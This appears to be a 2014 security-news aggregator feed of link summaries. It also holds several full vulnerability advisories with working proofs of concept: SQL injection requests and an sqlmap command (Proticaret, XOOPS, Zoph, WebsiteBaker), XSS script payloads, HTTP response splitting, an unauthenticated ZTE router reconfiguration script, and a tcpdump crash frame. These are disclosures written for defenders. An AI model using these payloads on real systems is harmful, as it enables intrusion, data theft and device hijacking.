November 16, 2014, 1:06 pm
Today I was brought to the attention of a Tumblr post - apparently there's malware doing the rounds making use of Steam chat, (adding Steam friends and) spamming Steam users.
more here..........http://bartblaze.blogspot.com/2014/11/malware-spreading-via-steam-chat.html
![]()
↧
November 16, 2014, 9:49 pm
Today I'll be taking a look at Stuxnet, and at a kernel level mostly (as usual) more than its impact on user-mode. I'll still however be going over a few user-mode things as it ties in with our kernel level discussion.
more here.......http://bsodanalysis.blogspot.com/2014/11/stuxnet-kernel-analysis.html
![]()
↧
↧
November 17, 2014, 2:35 am
Document Title:============Proticaret E-Commerce Script v3.0 >= SQL InjectionRelease Date:===========13 Nov 2014Product & Service Introduction:========================Proticaret is a free e-commerce script.Abstract Advisory Information:=======================BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0Vulnerability Disclosure Timeline:=========================20 Oct 2014 : Contact with Vendor20 Nov 2014 : Vendor ResponseJune 26, 2014 : Patch Released13 Nov 2014 : Public DisclosureDiscovery Status:=============PublishedAffected Product(s):===============Promist Bilgi İletişim Teknolojileri A.ŞProduct: Proticaret E-commerce Script v3.0 >=Exploitation Technique:==================Remote, UnauthenticatedSeverity Level:===========CriticalTechnical Details & Description:========================SQL InjectionProof of Concept (PoC):==================Proof of ConceptRequest:<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:Header/> <soapenv:Body> <tem:GetProductCodes> <!--Optional:--> <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code> <!--Optional:--> <tem:StartWith>?</tem:StartWith> </tem:GetProductCodes> </soapenv:Body></soapenv:Envelope>Response:<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>System.Web.Services.Protocols.SoapException: Serverwas unable to process request. --->System.Data.SqlClient.SqlException: Conversion failed when convertingthe nvarchar value 'secretpassword' to data type int. at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.SqlInternalConnection.OnError(SqlExceptionexception, Boolean breakConnection, Action`1 wrapCloseInAction) atSystem.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior,SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean&dataReady) at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows) at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more) at System.Data.SqlClient.SqlDataReader.Read() at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith) --- End of inner exception stack trace ---</faultstring> <detail/> </soap:Fault> </soap:Body></soap:Envelope>Solution Fix & Patch:================Apply the patch for v3.0Security Risk:==========The risk of the vulnerabilities above estimated as critical.Credits & Authors:==============Bilgi Güvenliği AkademisiDisclaimer & Information:===================The information provided in this advisory is provided as it is without anywarranty. BGA disclaims all warranties, either expressed or implied,including the warranties of merchantability and capability for aparticular purpose. BGA or its suppliers are not liable in any case ofdamage, including direct, indirect, incidental, consequential loss ofbusiness profits or special damages.Domain: www.bga.com.trSocial: twitter.com/bgasecurityContact: bilgi@bga.com.trCopyright © 2014 | BGA ![]()
↧
November 17, 2014, 2:37 am
Verisure is a supplier of wireless home alarms and connected services for the home. A Verisure setup can be composed of multiple devices, sensors and/or detectors such as Motion detectors with camera, Magnetic contacts for doors or Windows, Smoke detectors, Keypads, Sirens, etc. Each component of the setup communicates using wireless technology with the central gateway called “Vbox”, it-self monitored by Verisure agents through the Internet and/or 3G connection.
As a Verisure customer, I was curious to get a clear view of the design and security measures implemented by the manufacturer. I therefore decided to buy a testing Kit on eBay (120 Euros) to open it and starting an exciting journey inside the boxes.
more here...........http://funoverip.net/2014/11/reverse-engineer-a-verisure-wireless-alarm-part-1-radio-communications/
![]()
↧
November 17, 2014, 2:39 am
I wrote a blog post on the technique used by this plugin here a while back. Many WAF devices can be tricked into believing a request is from itself, and therefore trusted, if specific headers are present.
more here.........https://www.codewatch.org/blog/?p=408
![]()
↧
↧
November 17, 2014, 2:42 am
=============================================MGC ALERT 2014-003- Original release date: March 6, 2014- Last revised: November 18, 2014- Discovered by: Manuel Garcia Cardenas- Severity: 7,1/10 (CVSS Base Score)=============================================I. VULNERABILITY-------------------------Blind SQL Injection in XOOPS <= 2.5.6II. BACKGROUND-------------------------XOOPS is an acronym of "eXtensible Object Oriented Portal System". Thoughstarted as a portal system, it later developed into a web applicationframework. It aims to serve as a web framework for use by small, medium andlarge sites, through the installation of modules.III. DESCRIPTION-------------------------It is possible to inject SQL code in the variable "selgroups" on the page"admin.php". This bug was found using the portal with authentication. Toexploit the vulnerability only is needed use the version 1.0 of the HTTPprotocol to interact with the application.IV. PROOF OF CONCEPT-------------------------The following URL's and parameters have been confirmed to all suffer fromBlind SQL injection./xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1Exploiting with SQLMap:python sqlmap.py -u "http://192.168.244.129/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1"--cookie="PHPSESSID=kjrjempn828cgrv6k8tjp4fs60;xoops_user=0" -p"selgroups" --technique=TB --dbs[INFO] POST parameter 'selgroups' is 'MySQL > 5.0.11 AND time-based blind(comment)' injectable[INFO] POST parameter 'selgroups' is 'OR boolean-based blind - WHERE orHAVING clause (MySQL comment)' injectable[INFO] the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)web application technology: PHP 5.3.2, Apache 2.2.14back-end DBMS: MySQL 5[INFO] fetching database names[INFO] fetching number of databases[INFO] resumed: 4[INFO] resumed: information_schema[INFO] resumed: mysql[INFO] resumed: phpmyadmin[INFO] resumed: xoopsavailable databases [4]:[*] information_schema[*] mysql[*] phpmyadmin[*] xoopsV. BUSINESS IMPACT-------------------------Public defacement, confidential data leakage, and database servercompromise can result from these attacks. Client systems can also betargeted, and complete compromise of these client systems is also possible.VI. SYSTEMS AFFECTED-------------------------XOOPS <= 2.5.6VII. SOLUTION-------------------------Update to version 2.5.7VIII. REFERENCES-------------------------http://xoops.org/http://xoops.org/modules/news/article.php?storyid=6658IX. CREDITS-------------------------This vulnerability has been discovered and reportedby Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).X. REVISION HISTORY-------------------------January 21, 2014 1: Initial releaseXI. DISCLOSURE TIMELINE-------------------------March 5, 2014 1: Vulnerability acquired by Manuel Garcia CardenasMarch 5, 2014 2: Send to vendorJune 17, 2014 3: New version that includes patched codehttp://xoops.org/modules/news/article.php?storyid=6658November 18, 2014 4: Sent to listsXII. LEGAL NOTICES-------------------------The information contained within this advisory is supplied "as-is" with nowarranties or guarantees of fitness of use or otherwise.XIII. ABOUT-------------------------Manuel Garcia CardenasPentester ![]()
↧
November 17, 2014, 2:42 am
=============================================MGC ALERT 2014-002- Original release date: March 5, 2014- Last revised: November 17, 2014- Discovered by: Manuel Garcia Cardenas- Severity: 4,8/10 (CVSS Base Score)=============================================I. VULNERABILITY-------------------------Reflected XSS in Nibbleblog <= v4.0.1II. BACKGROUND-------------------------Nibbleblog is a powerful engine for creating blogs, all you need is PHP towork.III. DESCRIPTION-------------------------Has been detected a reflected XSS vulnerability in Nibbleblog, that allowsthe execution of arbitrary HTML/script code to be executed in the contextof the victim user's browser.The code injection is done through the parameter warning in the pageindex.php parameters "author_name" and "content".IV. PROOF OF CONCEPT-------------------------Malicious Request:http://vulnerablesite.com/nibbleblog/index.php?controller=post&action=view&id_post=1
hash=10905d09405f5db41d3c6645fd23e72746f76106&author_name=<XSSinjection>&author_email=&content=<XSS injection>Example:http://vulnerablesite.com/nibbleblog/index.php?controller=post&action=view&id_post=1
hash=10905d09405f5db41d3c6645fd23e72746f76106&author_name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&author_email=&content=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3EV. BUSINESS IMPACT-------------------------An attacker can execute arbitrary HTML or script code in a targeted user'sbrowser, this can leverage to steal sensitive information as usercredentials, personal data, etc.VI. SYSTEMS AFFECTED-------------------------Nibbleblog <= v4.0.1VII. SOLUTION-------------------------Update to version 4.0.2VIII. REFERENCES-------------------------http://www.nibbleblog.com/http://blog.nibbleblog.com/post/nibbleblog-v4.0.2-coffee/IX. CREDITS-------------------------This vulnerability has been discovered and reportedby Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).X. REVISION HISTORY-------------------------March 5, 2014 1: Initial releaseNovember 17, 2014 2: Last revisionXI. DISCLOSURE TIMELINE-------------------------March 5, 2014 1: Vulnerability acquired by Manuel Garcia CardenasMarch 5, 2014 2: Send to vendorMarch 7, 2014 3: New version that includes patched codehttp://blog.nibbleblog.com/post/nibbleblog-v4.0.2-coffee/November 17, 2014 4: Sent to listsXII. LEGAL NOTICES-------------------------The information contained within this advisory is supplied "as-is" with nowarranties or guarantees of fitness of use or otherwise.XIII. ABOUT-------------------------Manuel Garcia CardenasPentester ![]()
↧
November 17, 2014, 3:58 am
Microsoft addressed CVE-2014-6321 this Patch Tuesday, which has been hyped as the next Heartbleed. This vulnerability (actually at least 2 vulnerabilities) promises remote code execution in applications that use the SChannel Security Service Provider, such as Microsoft Internet Information Services (IIS).
The details have been scarce. Lets fix that.
- See more at: http://blog.beyondtrust.com/triggering-ms14-066#sthash.K0THB0QM.dpuf
![]()
↧
November 17, 2014, 8:27 am
During last Hackito Session, a group of passionate tech gathered and during one evening dug whatever they could on BTsync. The goal of this Hackito Session was to analyze the security of BTsync.
more here........http://2014.hackitoergosum.org/bittorrentsync-security-privacy-analysis-hackito-session-results/
![]()
↧
↧
November 17, 2014, 8:30 am
LinuxChiro
==========
Posture checking and correcting for Linux
What it checks/fixes:
- Files/folders for permissions and/or ownership
- Config files for correct option/value settings (separator can be specified)
- Ex: "PermitEmptyPasswords no" in sshd_config or "net.ipv4.tcp_syncookies = 1" in /etc/sysctl.conf
- Service checks (Running and Starup Configs)
Core functionality:
- Examination - Audit things to be fixed, things already fixed or the status of all
- Prescription - Produces a list of what commands that should be run to resolve issues
- Adjustment - Fix issues interactively (locally) and non-interactively (locally/remotely)
- Insurance - Backs up things before making each change and creates a list of commands to run to easily undo changes
more here........https://github.com/johnculkin/LinuxChiro
![]()
↧
November 17, 2014, 10:06 am
=============================================MGC ALERT 2014-004- Original release date: March 11, 2014- Last revised: November 18, 2014- Discovered by: Manuel Garcia Cardenas- Severity: 10/10 (CVSS Base Score)=============================================I. VULNERABILITY-------------------------Multiple Vulnerabilities in WebsiteBaker 2.8.3II. BACKGROUND-------------------------WebsiteBaker helps you to create the website you want: A free, easy andsecure, flexible and extensible open source content management system (CMS).III. DESCRIPTION-------------------------It is possible to inject SQL code in the variable "id" on the page"modify.php". This bug was found using the portal without authentication.To exploit the vulnerability only is needed use the version 1.0 of the HTTPprotocol to interact with the application.Has been detected a reflected XSS vulnerability in WebsiteBaker, thatallows the execution of arbitrary HTML/script code to be executed in thecontext of the victim user's browser.An input validation problem exists within WebsiteBaker which allowsinjecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n)characters into the server HTTP response header, resulting in a HTTPResponse Splitting Vulnerability.IV. PROOF OF CONCEPT-------------------------SQL Injection:/wb/admin/pages/modify.php?page_id=1Cross-Site Scripting GET:/wb/admin/admintools/tool.php?tool=captcha_control&6d442"><script>alert(1)</script>8e3b12642a8=1/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1§ion_id=%007e393<script>alert(1)</script>9f8a40a7355f9acf0/wb/modules/news/add_post.php?page_id=1§ion_id=f953a"><script>alert(1)</script>4ddf3369c1f/wb/modules/news/modify_group.php?page_id=1§ion_id=%008cf03"><script>alert(1)</script>2680504c3ec&group_id=62be99873b33d1d3/wb/modules/news/modify_post.php?page_id=1§ion_id=%003874a<script>alert(1)</script>4194d511605&post_id=db89943875a2db52/wb/modules/news/modify_settings.php?page_id=1§ion_id=8b2f4"><script>alert(1)</script>bdc8b3919b5HTTP RESPONSE SPLITTING:If you enter a valid user and password, you can inject on the headersmalicious code, example.POST /wb/admin/login/index.php HTTP/1.1Content-Length: 204Content-Type: application/x-www-form-urlencodedReferer: http://192.168.244.129:80/wb/Host: 127.0.0.1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*password_fieldname=password_nwh1uuwb&password_nwh1uuwb=VALIDPASS&remember=true&submit=Entrar&url=%0d%0a%20InjectedHeader:MaliciousCode&username_fieldname=username_nwh1uuwb&username_nwh1uuwb=adminResponseYou can inject a new header named: InjectedHeader:MaliciousCode because weinject a CR&LF new line with %0d%0a%20.V. BUSINESS IMPACT-------------------------Public defacement, confidential data leakage, and database servercompromise can result from these attacks. Client systems can also betargeted, and complete compromise of these client systems is also possible.VI. SYSTEMS AFFECTED-------------------------WebsiteBaker <= 2.8.3VII. SOLUTION-------------------------No news releasesVIII. REFERENCES-------------------------http://www.websitebaker.orgIX. CREDITS-------------------------This vulnerability has been discovered and reportedby Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).X. REVISION HISTORY-------------------------March 11, 2014 1: Initial releaseXI. DISCLOSURE TIMELINE-------------------------March 11, 2014 1: Vulnerability acquired by Manuel Garcia CardenasMarch 11, 2014 2: Send to vendorJune 05, 2014 3: Second mail to the verdor without responseNovember 18, 2014 4: Sent to listsXII. LEGAL NOTICES-------------------------The information contained within this advisory is supplied "as-is" with nowarranties or guarantees of fitness of use or otherwise.XIII. ABOUT-------------------------Manuel Garcia CardenasPentester ![]()
↧
November 17, 2014, 10:08 am
It’s been two months since our disclosure of an Object Injection vulnerability affecting versions <2.3.3 of the Joomla! Hikashop extension. The vulnerability allowed an attacker to execute malicious code on a target website.
How Does Object Injection Work?
more here........http://blog.sucuri.net/2014/11/deep-dive-into-the-hikashop-vulnerability.html
![]()
↧
November 17, 2014, 10:09 am
=============================================MGC ALERT 2014-005- Original release date: March 5, 2014- Last revised: November 18, 2014- Discovered by: Manuel Garcia Cardenas- Severity: 10/10 (CVSS Base Score)=============================================I. VULNERABILITY-------------------------Multiple Vulnerabilities in Zoph <= 0.9.1II. BACKGROUND-------------------------Zoph (Zoph Organizes Photos) is a web based digital image presentation andmanagement system. In other words, a photo album. It is built with PHP,MySQL and Perl.III. DESCRIPTION-------------------------It is possible to inject SQL code in the variables "id" and "action" on thepages group, photos and user. This bug was found using the portal withauthentication. To exploit the vulnerability only is needed use the version1.0 of the HTTP protocol to interact with the application.Has been detected a reflected XSS vulnerability in Zoph, that allows theexecution of arbitrary HTML/script code to be executed in the context ofthe victim user's browser.IV. PROOF OF CONCEPT-------------------------SQL Injection:/zoph/php/group.php?_action=1'%22&_clear_crumbs=1/zoph/php/photos.php?location_id=1'%22/zoph/php/user.php?user_id=&_action=1'%22Cross-Site Scripting GET:/zoph/php/edit_photos.php?photographer_id=3"><script>alert(1)</script>/zoph/php/edit_photos.php?album_id=2&_crumb=3"><script>alert(1)</script>V. BUSINESS IMPACT-------------------------Public defacement, confidential data leakage, and database servercompromise can result from these attacks. Client systems can also betargeted, and complete compromise of these client systems is also possible.VI. SYSTEMS AFFECTED-------------------------Zoph <= 0.9.1VII. SOLUTION-------------------------No news releasesVIII. REFERENCES-------------------------http://www.zoph.org/IX. CREDITS-------------------------This vulnerability has been discovered and reportedby Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).X. REVISION HISTORY-------------------------March 11, 2014 1: Initial releaseXI. DISCLOSURE TIMELINE-------------------------March 5, 2014 1: Vulnerability acquired by Manuel Garcia CardenasMarch 5, 2014 2: Send to vendorJune 17, 2014 3: Second mail to the verdor without responseNovember 18, 2014 4: Sent to listsXII. LEGAL NOTICES-------------------------The information contained within this advisory is supplied "as-is" with nowarranties or guarantees of fitness of use or otherwise.XIII. ABOUT-------------------------Manuel Garcia CardenasPentester ![]()
↧
↧
November 17, 2014, 10:00 pm
About the software==================ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers.Vulnerability Details=====================CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting their subscribers' equipment. However editing the CWMP configuration (more specifically sending the POST request) does not require any user authentication.Affected Products=================Device model : ZTE ZXHN H108LFirmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4Proof of Concept================#!/usr/bin/pythonimport requestsacs_server = "http://<server>:<port>"acs_user = "user"acs_pass = "pass"# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination,# router will connect back to the ACS server.conn_url = "/tr069"conn_port = "7564"conn_user = "user"conn_pass = "pass"#Periodic inform parametersactive = 1interval = 2000payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' }r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", data=payload)Impact======The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to WAN. Also because the router lacks of CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a malicious web page.Severity========MediumReferences==========https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/Disclosure Timeline===================27/10/2014 - First communication attempt to both vendor and ISP04/11/2014 - ZTE response states that ISP should be contacted03/11/2014 - Second attempt to contact the ISP.14/11/2014 - No response from ISP. Public DisclosureContact Information===================Domain: https://projectzero.grSocial: twitter.com/projectzerolabsContact: labs _at_ projectzero.gr ![]()
↧
November 18, 2014, 5:49 am
Last August, at Defcon, the hacker conference in Las Vegas, a boyish 40-year-old engineer and security researcher named Michael Ossmann stood on the stage of a lecture hall, about to detail a stunning new set of tools designed for spying on a wealth of electronic devices.
more here........http://motherboard.vice.com/read/michael-ossmann-and-the-nsa-playset
![]()
↧
November 18, 2014, 5:51 am
The probably oldest complaint about TLS is that its handshake is slow and together with the transport encryption has a lot of CPU overhead. This certainly is not true anymore if configured correctly (even if some companies choose to ignore that).
One of the most important features to improve user experience for visitors accessing your site via TLS is session resumption
more here......https://timtaubert.de/blog/2014/11/the-sad-state-of-server-side-tls-session-resumption-implementations/
![]()
↧
November 18, 2014, 1:14 pm
Last week Microsoft released EMET 5.1 to address some compatibility issues and strengthen mitigations to make them more resilient to attacks and bypasses. We, of course, were curious to see if our EMET 5.0 disarming technique has been addressed by the latest version of the toolkit.
more here.........http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/
![]()
↧
↧
November 18, 2014, 1:15 pm
Recursion is the process of repeating items in a self-similar way, and that’s what the XML Entity Expansion (XEE)[1] is about: a small string is referenced a huge number of times.
Technology standards sometimes include features that affect the security of applications. Amit Klein found in 2002 that XML entities could be used to make parsers consume an unlimited amount of resources and then crash, which is called a billion laughs attack.
more here........http://blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html
![]()
↧
November 18, 2014, 1:16 pm
Recently, we came across a malware sample that has been traversing the Internet disguised as an image of a woman. The malware sample uses several layers of obfuscation to hide its payload, including the use of steganography.
more here.........http://blogs.cisco.com/security/talos/reversing-multilayer-net-malware
![]()
↧
November 18, 2014, 4:51 pm
CVE-2014-8768 tcpdump denial of service in verbose mode using malformed Geonet payload1. Backgroundtcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.2. Summary InformationIt was found out that malformed network traffic (Geonet-based) can lead to an application crash (denial of service) if verbose output of tcpdump monitoring the network is used.3. Technical DescriptionThe application decoder for the geonet protocol fails to perform external input validation and performs insufficient checking on length computations leading to an unsafe decrement and underflow in the functiongeonet_print(netdissect_options *ndo, const u_char *eth, const u_char *bp, u_int length)The affected variable is length which is later on used to print a memory chunk which eventually leads to a segfault. The function contains several unsafe computations updating the length variable.To reproduce start tcpdump on a network interfacesudo tcpdump -i lo -s 0 -n -v(running the program with sudo might hide the segfault message on certain environments, see dmesg for details)and use the following python program to generate a frame on the network (might also need sudo):#!/usr/bin/env pythonfrom socket import socket, AF_PACKET, SOCK_RAWs = socket(AF_PACKET, SOCK_RAW)s.bind(("lo", 0))geonet_frame = "\x00\x1f\xc6\x51\x07\x07\x07\x07\x07\x07\x07\x07\x07\x07\xc6\x51\x07\x07\x07\x07\x07\x07\xef\x06\x07\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\x00\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x01\x01\x01\x99\x80\x00\x35\x00\x29\x16\xa5\x01\x76\x01\x00\x00\xff\x00\x00\x01\x00\x00\x00"s.send(geonet_frame)4. Affected versionsAffected versions are 4.5.0 through 4.6.2(segfaults were reproducible in versions up to 4.6.1 on Ubuntu 14.04, but not reliably in 4.6.2. Code audit showed that unsafe computations are performed in 4.6.2, but the trigger frame might need to look different).5. FixThe problem is fixed in the upcoming version tcpdump 4.7.06. Advisory Timeline2014-11-08 Discovered2014-11-09 Requested CVE2014-11-11 Reported vendor by email2014-11-12 Vendor made a fix available as repository patch2014-11-13 CVE number received2014-11-13 Published CVE advisory7. CreditThe issue was found bySteffen BauchTwitter: @steffenbauchhttp://steffenbauch.deusing a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski. ![]()
↧